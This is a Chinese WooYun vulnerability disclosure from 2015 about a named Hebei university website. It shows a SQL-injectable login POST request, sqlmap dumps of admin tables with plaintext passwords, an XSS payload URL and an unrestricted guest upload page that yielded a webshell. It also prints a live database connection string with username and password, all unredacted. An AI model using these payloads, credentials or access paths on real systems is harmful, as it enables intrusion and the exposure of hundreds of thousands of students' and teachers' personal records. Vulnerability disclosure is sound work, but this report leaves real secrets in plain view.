当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121290

漏洞标题:河北某大学SQL注入+XSS(已入后台Shell)

相关厂商:CCERT教育网应急响应组

漏洞作者: 路人甲

提交时间:2015-06-18 16:29

修复时间:2015-06-23 16:30

公开时间:2015-06-23 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入
XSS(反射存储)
上传
泄漏大量教师、学生、四六级等个人信息几十万数据库信息

详细说明:

0x01 SQL注入漏洞
POST 注入,在这个漏洞上就能把数量统计出来啦

POST /jpk/loginyanzheng.aspx HTTP/1.1
Content-Length: 217
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDAAADQARS=FDEBKICDDLBKGHMGNDAMANDG; ASP.NET_SessionId=g502e555fed4jo555ldmrgyf; cookiesname=fbscjyga
Host: jpk.heuet.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
submit=%e7%99%bb%20%20%e5%bd%95&p=a&u=1


sqlmap 截图

sqlmap.jpg


available databases [10]:
[*] DGSX
[*] English
[*] JWC
[*] master
[*] model
[*] msdb
[*] Teacher
[*] tempdb
[*] yishu
[*] zcyl


几个密码表

Database: English
Table: admin
[7 entries]
+----+-------+-------+--------+----------+-----------+
| id | popem | state | module | password | adminname |
+----+-------+-------+--------+----------+-----------+
| 1 | 1 | 1 | 超级管理 | 123456 | admin |
| 6 | 0 | 1 | 交流园地 | 123456 | chat |
| 5 | 0 | 1 | 考试指南 | 123456 | exam |
| 7 | 0 | 1 | 相关链接 | 123456 | link |
| 4 | 0 | 1 | 写作自测 | 123456 | test |
| 3 | 0 | 1 | 理论技巧 | 123456 | theory |
| 2 | 0 | 1 | 写作资源 | 123456 | write |
+----+-------+-------+--------+----------+-----------+
Database: JWC
Table: admin
[17 entries]
+----+--------------+-------+----------+----------+
| id | smallclassid | popem | username | password |
+----+--------------+-------+----------+----------+
| 10 | 9 | 0 | sysgl | 87656716 |
| 10 | 9 | 0 | sysgl | 87656716 |
| 11 | 3 | 0 | szk | 87655665 |
| 12 | 6 | 0 | xsk | 87655613 |
| 13 | 7 | 0 | xxzx | 87655970 |
| 2 | 11 | 0 | gjyjs | 7326042 |
| 33 | 5 | 0 | jck | 87655842 |
| 43 | 10 | 0 | dmtjsgl | 87326025 |
| 43 | 10 | 0 | dmtjsgl | 87326025 |
| 46 | 22 | 0 | jxszlt | jxszlt |
| 47 | 24 | 0 | bgxz | 87655654 |
| 48 | 25 | 0 | syzx | 87656338 |
| 5 | 18 | 0 | jsglk | 87326025 |
| 6 | 1 | 0 | jwcbgs | 87655649 |
| 7 | 2 | 0 | jwk | 87655654 |
| 8 | 8 | 0 | jxjck | 87655875 |
| 9 | 4 | 0 | jxk | 737678 |
+----+--------------+-------+----------+----------+


统计下,目前连接的裤子有多少条记录
艺术类几十万

Database: yishu
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.KSBMK | 284090 |
| dbo.KSYSK | 60761 |
| dbo.YXMCK | 2428 |
| dbo.YXZYK | 1776 |
| dbo.xuexiaozy | 74 |
| dbo.CJK | 29 |
+--------------------------------------------------+---------+


教师的数据有几万

Database: Teacher
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.T教学 | 27863 |
| dbo.V教学 | 27863 |
| dbo.SZJX | 7450 |
| dbo.T帐号 | 1189 |
| dbo.V帐号 | 1101 |
| dbo.szjb | 1097 |
| dbo.T教师 | 1060 |
| dbo.V教师 | 1060 |
| dbo.TRP教学学年 | 477 |
| dbo.VRP教学学年 | 477 |
| dbo.TRP教学自然年 | 295 |
| dbo.VRP教学自然年 | 295 |
| dbo.T进修 | 100 |
| dbo.V进修 | 100 |
| dbo.T院部 | 99 |
| dbo.V院部 | 99 |
| dbo.T教师调出 | 52 |
| dbo.V教师调出 | 52 |
| dbo.T配置 | 47 |
| dbo.T教师退休 | 36 |
| dbo.V教师退休 | 36 |
| dbo.T汇总 | 6 |
| dbo.V汇总通表 | 6 |
| dbo.T权限 | 5 |
+--------------------------------------------------+---------+


0x02 XSS
http://jpk.heuet.edu.cn/nmh/yymj.asp?categoryID=1'%22()%26%25<woo><ScRiPt%20>alert(1)</ScRiPt>&page=2

xss.jpg


0x03 上传漏洞

http://jpk.heuet.edu.cn/jpk/gxxz/lb_upload.aspx


以游客身份登录即可

upload.jpg


没有任何限制,上传ASPX asp PHP 都能解析,

cha.jpg


http://jpk.heuet.edu.cn/jpk/gxxz/lb_selectFile.aspx


aaa.jpg


webshell01.jpg


里面的信息随便下载审核即可,当然也可以提权MS11-046这个补丁没有打,可以创建高管。请自行删除。
敏感数据

<connectionStrings>
<add name="constr" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;Connect Timeout=30;"/>
<add name="OA_DBConnectionString" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;"/>
<add name="OA_DBConnectionString1" connectionString="Data Source=JWC\SQLEXPRESS;database=zcyl;Integrated Security=SSPI;uid=wangjunchao;password=wangjunchao12302;"/>


看一下server上面打包的数据库有哪些 113MB的数据库文件

DB1.jpg


四六级的数据就多了,感觉数学都不好使啦,28.6MB的access 的数据库

46.jpg


photo里面的个人信息 一个表中也就五万条

photo.jpg


其他的mdf ldf 可以附加在SQL2005 记得权限哦
teacher.mdf

teacher.jpg


zcyl.mdf

zcyl.jpg


漏洞证明:

webshell01.jpg


DB1.jpg

修复方案:

修改源代码
防注入防上传

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-23 16:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-23 23:28 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 我是来学习滴~~)

    相当6啊,不过记得打码么~~